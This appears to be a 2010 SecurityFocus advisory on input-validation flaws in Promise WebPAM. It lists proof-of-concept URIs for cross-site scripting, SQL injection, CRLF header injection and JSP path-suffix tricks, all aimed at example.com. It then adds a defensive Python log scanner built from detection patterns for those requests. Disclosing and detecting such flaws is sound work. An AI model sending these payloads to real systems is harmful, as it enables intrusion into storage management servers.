Promise WebPAM Multiple Input Validation Vulnerabilities

An attacker can exploit some of these issues with a browser. To exploit a cross-site scripting issue, the attacker must entice an unsuspecting victim to follow a malicious URI.

The following example URIs are available:


https://www.example.com/promise/ent_i.jsp?startTime=<script>alert("ZSL");</script>
https://www.example.com/promise/ent_i.jsp?endTime=<script>alert("ZSL");</script>
https://www.example.com/promise/ent_i.jsp?entSortOrder=desc%27
https://www.example.com/promise/ent_i.jsp?entSort=time%27
https://www.example.com/promise/tools/sqlrun.jsp?sqlstr=[QUERY SQLi]
https://www.example.com/promise/usr_ent.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
https://www.example.com/promise/usr_t.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection
https://www.example.com/promise/index.jsp%00
https://www.example.com/promise/index.jsp%20
https://www.example.com/promise/index.jsp%5C
https://www.example.com/promise/index.jsp#
https://www.example.com/promise/index.jsp\
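
For defenders reviewing web server logs, the request patterns in the URIs above can be checked for mechanically. The following is an added example, not part of the original advisory or of WebPAM: the rule labels, the character classes assumed for legitimate parameter values, and the sample log lines are all constructed for illustration.

```python
import re
from urllib.parse import parse_qsl

# Parameter names are from the URIs above; the character classes are assumed.
MARKUP = re.compile(r"[<>\"']")
NON_ALPHA = re.compile(r"[^A-Za-z_]")
PARAM_RULES = {
    "startTime": ("markup-in-time", MARKUP),
    "endTime": ("markup-in-time", MARKUP),
    "entSortOrder": ("nonalpha-sort", NON_ALPHA),
    "entSort": ("nonalpha-sort", NON_ALPHA),
    "userID": ("crlf-in-userid", re.compile(r"[\r\n]")),
}
# Trailing forms listed for index.jsp: %00, %20, %5C, "#" and a raw backslash.
JSP_SUFFIX = re.compile(r"\.jsp(?:%00|%20|%5c|\\|#)", re.IGNORECASE)
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def classify(target):
    """Return the sorted rule labels that one raw request target trips."""
    hits = set()
    raw_path, _, raw_query = target.partition("?")
    if JSP_SUFFIX.search(raw_path):
        hits.add("jsp-suffix")
    if raw_path.lower().endswith("/tools/sqlrun.jsp") and "sqlstr=" in raw_query:
        hits.add("sqlrun-access")
    # parse_qsl percent-decodes, so %27 and %0D%0A are tested as ' and CR LF.
    for name, value in parse_qsl(raw_query, keep_blank_values=True):
        label, pattern = PARAM_RULES.get(name, (None, None))
        if pattern and pattern.search(value):
            hits.add(label)
    return sorted(hits)

def scan(log_lines):
    """Return [(line_number, labels)] for access-log lines with a finding."""
    return [(n, labels) for n, line in enumerate(log_lines, 1)
            if (m := REQUEST.search(line)) and (labels := classify(m.group(1)))]

# Constructed access-log lines; the request targets mirror the URIs above.
SAMPLE_LOG = [
    '192.0.2.10 "GET /promise/ent_i.jsp?startTime=2010-05-01&entSortOrder=desc HTTP/1.1" 200',
    '192.0.2.44 "GET /promise/ent_i.jsp?endTime=<script>alert("ZSL");</script> HTTP/1.1" 200',
    '192.0.2.44 "GET /promise/ent_i.jsp?entSort=time%27 HTTP/1.1" 500',
    '192.0.2.44 "GET /promise/usr_t.jsp?userID=%0D%0AZSL%2DCustom%2DHeader%3Alove_injection HTTP/1.1" 200',
    '192.0.2.44 "GET /promise/tools/sqlrun.jsp?sqlstr=PLACEHOLDER HTTP/1.1" 200',
    '192.0.2.44 "GET /promise/index.jsp%00 HTTP/1.1" 200',
]

if __name__ == "__main__":
    print(scan(SAMPLE_LOG))
```

The first sample line is a benign request and produces no finding; the remaining five each trip one rule.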


 

Copyright 2010, SecurityFocus